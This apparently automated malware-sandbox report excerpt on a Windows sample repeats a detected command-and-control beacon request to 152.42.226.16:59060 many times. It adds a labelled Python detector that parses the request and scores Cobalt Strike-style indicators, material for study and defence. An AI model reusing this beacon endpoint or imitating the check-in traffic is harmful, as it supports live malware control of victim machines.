                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: unknown  TCP traffic detected without corresponding DNS query: 152.42.226.16
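The beacon request above carries the traits an analyst would score by hand: a bare IP literal in the Host header with no preceding DNS lookup, HTTP on port 59060, a fixed two-character GET path, a legacy IE7/Windows XP user-agent, and a Cookie that is not a set of name=value pairs but a single base64 blob. Decoded, that blob is 128 bytes, which is the ciphertext size of the 1024-bit RSA key Cobalt Strike uses to encrypt beacon metadata, and the Cookie header is where the default HTTP GET profile puts it. The following Python is an added example, not code from the Joe Sandbox report or from the sample: it re-splits the request exactly as the report prints it (headers run together because the CRLF separators were lost), then scores those indicators. The helper names, the individual checks and the "three or more indicators" verdict threshold are assumptions for illustration.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field
from ipaddress import ip_address
from typing import Dict, List, Optional, Tuple

# The beacon request as the report prints it: the CRLF separators were lost to
# extraction, so the request line and the headers run together (constructed
# from the report's evidence line, byte for byte).
SAMPLE_LINE = (
    "GET /cx HTTP/1.1"
    "Accept: */*"
    "Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/"
    "rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM="
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
    "Host: 152.42.226.16:59060"
    "Connection: Keep-Alive"
    "Cache-Control: no-cache"
)

# Header names a WinINet GET emits; used to re-split the flattened line.
HEADER_NAMES = ("Accept", "Cookie", "User-Agent", "Host", "Connection", "Cache-Control")
_SPLIT = re.compile(r"(?=(?:%s): )" % "|".join(re.escape(h) for h in HEADER_NAMES))

# Size of an RSA-1024 ciphertext; Cobalt Strike encrypts beacon metadata with
# a 1024-bit team-server key before base64-encoding it into the Cookie header.
RSA_1024_CIPHERTEXT_LEN = 128


@dataclass
class BeaconVerdict:
    method: str
    path: str
    headers: Dict[str, str]
    indicators: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Assumed threshold for illustration: three independent indicators.
        return len(self.indicators) >= 3


def parse_flat_request(line: str) -> Tuple[str, str, Dict[str, str]]:
    """Split 'GET /cx HTTP/1.1Accept: */*Cookie: ...' back into its parts."""
    parts = [p for p in _SPLIT.split(line) if p]
    method, path, _version = parts[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for part in parts[1:]:
        name, _, value = part.partition(": ")
        headers[name] = value
    return method, path, headers


def cookie_is_opaque_blob(cookie: str) -> Optional[int]:
    """Return the decoded length if the Cookie is one base64 token, else None."""
    if ";" in cookie or "=" in cookie.rstrip("="):
        return None  # ordinary name=value cookie pairs
    try:
        return len(base64.b64decode(cookie, validate=True))
    except (binascii.Error, ValueError):
        return None


def assess(line: str) -> BeaconVerdict:
    """Score the flattened request against the indicators seen in this sample."""
    method, path, headers = parse_flat_request(line)
    verdict = BeaconVerdict(method, path, headers)
    host, _, port = headers.get("Host", "").partition(":")  # IPv4/hostname only
    try:
        ip_address(host)
        verdict.indicators.append("Host is an IP literal (no DNS query expected)")
    except ValueError:
        pass
    if port and port not in ("80", "443"):
        verdict.indicators.append("HTTP on non-standard port %s" % port)
    if cookie_is_opaque_blob(headers.get("Cookie", "")) == RSA_1024_CIPHERTEXT_LEN:
        verdict.indicators.append("Cookie is a 128-byte opaque blob (RSA-1024 ciphertext size)")
    if "MSIE 7.0; Windows NT 5.1" in headers.get("User-Agent", ""):
        verdict.indicators.append("legacy IE7/Windows XP user-agent")
    if method == "GET" and len(path.strip("/")) <= 4:
        verdict.indicators.append("short fixed GET path")
    return verdict


if __name__ == "__main__":
    result = assess(SAMPLE_LINE)
    for hit in result.indicators:
        print("-", hit)
    print("suspicious:", result.suspicious)
```

The re-split keys on the header names WinINet emits, which is enough for report text; on a real pcap the request is already line-separated and `parse_flat_request` can be replaced by an ordinary header parser while the scoring stays the same. The 128-byte cookie check is the strongest single signal here because benign session cookies are name=value pairs, not a lone RSA-sized blob.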
                    Source: C:\Users\user\Desktop\12.exe  Code function: 0_2_00DB2C3F _memset, __snprintf, __snprintf, __snprintf, HttpOpenRequestA, HttpSendRequestA, InternetCloseHandle, InternetQueryDataAvailable, InternetReadFile, InternetCloseHandle, InternetCloseHandle  0_2_00DB2C3F
                    Source: global traffic  HTTP traffic detected:
                        GET /cx HTTP/1.1
                        Accept: */*
                        Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                        Host: 152.42.226.16:59060
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
